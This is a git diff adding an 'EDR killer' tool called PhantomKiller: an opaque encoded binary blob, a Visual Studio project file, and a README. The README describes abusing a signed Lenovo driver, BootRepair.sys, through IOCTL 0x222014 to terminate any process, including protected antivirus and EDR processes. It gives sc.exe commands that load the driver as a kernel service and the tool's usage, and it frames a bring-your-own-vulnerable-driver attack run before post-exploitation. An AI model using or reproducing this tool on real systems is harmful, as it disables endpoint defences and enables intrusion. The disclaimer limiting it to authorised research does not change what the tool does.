zn;a^s2P3|c_Wp4y?&FioOQyVg@Aygl{;Q&!ZJ%yMA2Y1hzAUi461&o$^lj5i#b?V|
zc;o9Tx05UC_gv*+J#+V;Jv6UdyV1N7d~0k)qm!%mxQ}bH2c71g8@g~)VWs|wDZ6Jb
z+LrVnyj|I<ypn4VB|3{}H5bB1ji7LkUtKk2ee8@2E4Bw;xx9E}!1#(OJKaJrw8|(q
z3g2rNS9Pi|(S(w7nJatJ{@eEM$@FgP#*AA+D}J3CFJPMW)A|xNCG^N#v&jC=qvK|5
zE113M!iRJRn|W;~mYuUZGR=4HR{vAhqj@2_XiZy(beTTdg))D~kj#*}gV`DToP6Gm
zI}q1qh}9NG!F;bQmqB=zODLH{!ZYXnXoFS91^;OO{-3|7Cma8??eP69rci_%Yb<K?
zz0hLPy7{<7m*S<bQA~vw!}k@Co|hqPqkYet!(vf=`lCzrf=zP$!_&eh#P(cK_g3uL
zeMkLeuRV{KX}+T1tbv+E!rGX0SmY5=vC*G2@|5?ZG2z9}qAwkvJEnj)?G@w8&FSv#
zI<30<c#z<AuEU=GWACr^aCWvgDm*-Pl4b8tZU1O{{pgKa>*p2umVK9{9iz3Mz+cth
za&c*=Z};*Z9q61No=>}BQ}J!g$I*g|=Pt#G#*82Am^_)x8?v=7X3qy1*`&L0_drrn
z?Fe~s*4-^<d)C(lyBodpPVDS`_0#K$BSY;a<va51W!YKf&WVnzHXm%~W4SDTzrlL5
zPG__fmycI$>EYuMXctzKee?_-L+MoI>fSG+gTAL<N!XGvh40q*w6l*$nXoWnfQ!k7
z`Vngu_zmw@mi=^ogiGAbjJ;nynzZ(xTri<1%gF`LB5Qw_o|ab@sR^9VcSwiC|LW~)
zvhh#*=NcL^9DKXxVWoKKHD|O*pbpI?G%q7K$b#J>*rx2_<<kjX?mwzS@EK0~5rXa}
z47V9=`Kv|auXTF6{1@sllX>*(&gyUX+A4B_KkPYAf3&LpaR0t9t~}9->R{F|AhJtx
z#{06$g}r*FaAFD`a^6IWBb?tZd%LgNL+I8kX;IiQpL68iljjcV8g@VJ{4}@8VV>3>
zOCk>Wc}W~@iTW-rINfUU`JL19#@dZAyS#aOw>byqI6h0%E*ZUjH0?>??yYIPy0rDT
zkx&y3?|4m`J7mmKi*I>%v+jIe6Mnd=KfU{d^%pm#Z!T{z30`qwPUn;Rr)ueZO1#XP
z>Hp?H?jF4X!EdJz(d(eSdE+`!spF%wHTQ={rfxdzEjoSwt!(eZhi}%{JQ@{w<g3Fm
ziymcjx*fmoi_^5Pe!OyP;>etpP19FBi(b|N&vMY%XrPk3vK+JkMsAihI$CAC#j_Z%
zKs|^}G-9VhNTHHpM&XefbCOz!UU>iTc$GNXLAxBPx>N>l`mM;zLx=rgf57L~Jaf6*
z1f8t?WUWK{0<oSAuTPhBDa<l@|9e;S_paveT}`xs`g>RN_paveT}|aZl^^yR{@49n
zaF_o4BFpbxO>~hZi}ZU}lenWp`Ms<8dskEA=G^aHP52@KzMc5-H0!U->hE1m;(p-o
zUCrOSn*Z6mn#LJ;mhr^@yStjO6|b?CQJ6XF7h9VqT6ER@bX{wz7hHoS{r7h}J2r2~
zz;34_m9ea<IKgsr{iDoxE6)|aASWHY5a{%!&h6~BfHT1b4;WRy*y?i1swPd_{<$h;
zi1Dl2wfd!!)n{#(%*}=OF5E1h+1;Tg6W?#K=DFMTV?nRCZeF$dz|NH~jxUdlS^9z{
zSmnqZUhSi>o;JRBQA%05$fuAy=VqmF&f#-GMLS(f8edM&X&abvW6^vnmf_XSWBIv_
zr@juA2Xssyp0@3w(F<?ilk3<Clh{7_QF;$6CY+ml>5b^xAkK?Jr=BFaU$D)&|L9i6
z?$_m&ribmf^?oq)n`@UbAML97!G~H$w%_FZu}Amd=b5jHCX^bUmZoIAov8C=lc-Gx
zlg@G8#t)|M8@AzU)U;2t={07P0}RIAFHRit%z5t@x7xQmBaa>n$#83=?wp_b(eBOS
zqAWvqJj<|M^NtmT0^41NaC^kiv{|}nyUUOYAdF0+cp1R4(D!l1Grwu+sYlcpz9z_g
zNzHtYXV$^UwmfEU`6U6HC*{wso$XC|*{MFjEV1Z>jjapWtUdi(tyOJbmYE{6VL^)1
z1IuM=c3K(1b^Pz!n!ZDE&>FkK%)B+3*?49~%WEtD(?yRLTs9!i(OuQ&=<1t#&3CfV
zO}+2ee!UB`=yEs?_Jut;hU%`(1lo=(y!Zi}#)|w)%dJ<m($qV2%P{juOQ!#ccWr$C
z{#_fm+^+0u$L6~>@VV+Zp;#hFB+ici(H$G&Ot~|<mDqeqk?93l_+~=65KV2_z5nT$
zxWfGmVodD+bWGq&j=%Dh4h>l`WMJ@$8RFrsGgm(!_;x#KOOLUey=T$J<SlK7c`q6r
zSP^3u;CATv4YvcH_0hZTo$swTXm-;mo5|1DY2UvyWkeFo_sSftC+vyowr9_7u{l<~
zV9wiymx)bV7IyWVQrd2RTGx{~YhS$BHg)E?g7Tzimlp5oW^dPZMcKQh8{XyIJ8^O1
z*i%|=yL&&(HfUQmL8n*XNBTY{{AbGUSKjYj7I1IclGg7_o-)m@-7U|kne+17;kgmw
z)OS@ID!=KzpV#H+f@z~q-g>tq;L5o=-8m!o<fQvdPupzmJ<F-on{6}1aAU6>l^?IU
zzuH&*@M@bRlWucA%&S=bfcx@LnBkSqi}KP=7Ijfyt4Re(Nq)Lgf<CtS@k5Az?#;y3
z|L|s_r~0Z3T=9WBEx4UJ50?;IsjtouH)oW05RvM_VRA>@19vZUD{PnN(gI0&yHciB
zXAiOZv>1J7^wW14fA@wqQ{xPLTlBRv#X-5^+VzLoZ{1e=PRWpsYH{OnZ|bK6ZogGw
zt*#z_rtLjW`{E*P>mLk(@}A<e?H*S<Sx0*Ne>1#yC3sz0Y0C9yw{Hc%Ejpb!t#SP<
z^T#Z=Esux4TYY0tOwL%m{cSseWh`Tm)?({|;bY%4Ejq0G)pkz5iu-j1l+Ts3J6@wF
z1~Kce?Vfj<KRcS+mE~~a_O;~v#Xa^cUR1YHYoBh#tgs07?2h;B0)uXyF-}YDliaZP
zWRoB=^nK8WF$InN#~*!L^_6n{#s~Nx)DOZM>9YD$GS5x1xzr{5nzSPBoihATx9w*A
zGAsK{2Of08j-8u6|17CyWx4MmqtHJtKA2C5q6Zd!YnNo^{iXLJ*1cm(@@pP;H9K<i
z;pMVt?n8Gi7(9?VseEa@6Qv-x{UycLje<<DodIAwnJU{EKKRY1>+EZs!#Nu#6fO*X
z{Da8wf17PVUzl`(!?o{5&)XO8ggz8g8ohu2o9Hji-;%dqs;Rn^ypPu-*Uc;GGx6EP
z=<~y|`!nB`%)UFz?Y-5r`TOQRy1u<ol3DkZzO4U5l48ZIHC@*mKJ$O)sNYTWqN~6B
z;Ypjw2LJfJ&a~)p%WS`_Ol-en(4*;7LdR}><8!sIla}pyu1A~QRr_y@bDC+Z=ymLn
zR%C+qI-z0Hh^>=6Uj%OTc~x;8>+{uhf#Is*;y${E%WiTmy{PP$^YF_VkIjRRZf)Fp
zgJYnx?|AC9)_$Uk$&@>xb59uSjJ<Ktao`*K!!MSt=zf1h8-BK8k<kRbCj+yCE*U&O
zdcA&Ya=!zs?ykKy;4pRI3q?B-zv4yv0MmOr4)BdCNG}HpM<$TdV$b$go4<09RM`(7
zp!{zcI+oIKb;Y~jK84Ieue^>b!v$Zh{OVg0NxT5Q6Yx-ekV0H|`MaOWq^eCQnA9<N
z!hh*gneOVkI9ZdyUwta`1B39n%-=PqJ{sm!cTefJh2lkSeoHHA$p^PKeeHPgLkn~I
zOM9zv_eXs*(Q+4k+SACPBN$`4)6I7#p4>Ryd+OyK?`*@i<{s_6OmY42zWKSk%R?v6
zuRHQWu=C3LB@fFg=9T*N)T@i94<EGn$PP#NRC4_FV+~0Iyr*Avy6a2o^5K4%`*?Sg
zS^EML$1^E56UXSzw><Q)X7CjUQ{j{Pi!Nt6$d)dj@}=TX`}jXjOxk_ExFT`=jT6}N
ze0u7fcY&)vdv(uC{_xm7gp#-H*x5dRJRY}9Jk*3V{nV?qDGQ$5-g@w{qp-nhh>b}_
zRmQ&RMg8pi=rnB}Yrnm3*sd!(uNMCiBICBQ%-V9kmL2RpxoUy!u{qOqdahX?M_zc>
znZNb|yCf^Bc)F!`z~#f|*X*9*l|>#3R~ZHot3>&~&0La=e=_8ntA@hNHF)dh^#xpV
zF=(-f__J#b;Q#-)?pu91oyv(e&TQf&t-1Poc=C+m%RT(N*EvR+N}Zm)zhjAa(V$N5
z=micX`ZkoxI6uC0{Dpq?SHG6UJ5p>~U3sM~PjTmu7_-KH)|>MITjJ14N42(rNdy;V
z$Y!^y61QC9*IR#x{=mGoadqY`#}kidy6e5)xOqg%j#F#BUi3DZ<>LH-e8Ic5BE#{L
z`5haxgH|sx>yzG;>#~mBJtTCxW>9IdqTi*6=>h#Jf;JB|i|g{4TySmBGK+*;y`l|V
zrzUh|Us>)F^SndJ(QSEURh<4YOLlddk}{s|czyK^)*a`Buw>cjt<><xwG|;>PVY9!
z4D4{sMAvS%$un!7Xh=gwT!yDj)Y{uZgUNRE$+LQYS^1>i;*(ondAv~XMC;s35&0wR
z_~Ox>ZC>9xu-j?N;(HD~$+xbI5$@TzDxh(G;_Y^A+Mhk_GBG#EqO;S?UT@nLNokGG
Re4pCbIvqcMK=sM`{{yPZDo+3a

literal 0
HcmV?d00001

diff --git a/PhantomKiller.vcxproj b/PhantomKiller.vcxproj
new file mode 100644
index 0000000..c2b29e3
--- /dev/null
+++ b/PhantomKiller.vcxproj
@@ -0,0 +1,136 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>18.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{6596f834-4a7c-465f-9271-ffca5806403a}</ProjectGuid>
+    <RootNamespace>PhantomKiller</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v145</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v145</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v145</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v145</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp20</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp20</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp20</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp20</LanguageStandard>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="PhantomKiller.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..20e4b1b
--- /dev/null
+++ b/README.md
@@ -0,0 +1,56 @@
+# PhantomKiller
+
+weaponizing a signed lenovo kernel driver to terminate any process — including EDR/AV protected processes.
+
+## overview
+
+PhantomKiller abuses `BootRepair.sys`, a legitimate lenovo driver shipped with Lenovo PC Manager. the driver exposes a device object (`\\.\BootRepair`) with no DACL restrictions and a single IOCTL (`0x222014`) that takes a 4-byte PID and calls `ZwTerminateProcess`, no access checks, no caller validation, no protection.
+
+**full writeup:** [Phantom Killer — Reverse Engineering and Weaponizing a Lenovo Driver to Terminate EDR Processes](https://medium.com/@jehadbudagga/phantom-killer-reverse-engineering-and-weaponizing-a-lenovo-driver-to-terminate-edr-processes-9191cd06374f)
+
+## driver details
+
+| field | value |
+|-------|-------|
+| file name | `BootRepair.sys` |
+| sha256 | `5ab36c116767eaae53a466fbc2dae7cfd608ed77721f65e83312037fbd57c946` |
+| signer | LENOVO (Symantec Class 3 SHA256 Code Signing CA) |
+| compiled | 2018-01-03 |
+| arch | x64 |
+| VT detections | 0/71 at time of discovery |
+
+## vulnerability summary
+
+- device object created without secure DACL — any user can open a handle
+- `IRP_MJ_CREATE` (MajorFunction[0]) has no access checks
+- `IRP_MJ_DEVICE_CONTROL` (MajorFunction[14]) accepts IOCTL `0x222014`
+- input: 4-byte `DWORD` (target PID)
+- internally calls `PsLookupProcessByProcessId` → `ObOpenObjectByPointer` → `ZwTerminateProcess`
+- kills any process including PPL-protected AV/EDR processes
+
+## attack scenarios
+
+**driver already loaded:** any low-privileged user can open the device and terminate any process on the system.
+
+**BYOVD:** an attacker loads the signed driver via `sc.exe` or similar, then uses it to kill EDR processes before deploying post-exploitation tools.
+
+## usage
+
+```
+sc.exe create PhantomKiller binPath="C:\Path\to\BootRepair.sys" type=kernel
+sc.exe start PhantomKiller
+```
+
+```
+PhantomKiller.exe <pid>
+```
+
+
+
+## disclaimer
+
+this project is for **educational and authorized security research purposes only**. do not use this against systems you do not own or have explicit permission to test. the author is not responsible for any misuse.
+
+## author
+
+**j3h4ck** — [@j3h4ck](https://twitter.com/j3h4ck) | [linkedin](https://www.linkedin.com/in/jehadabudagga/) | [medium](https://medium.com/@j3h4ck)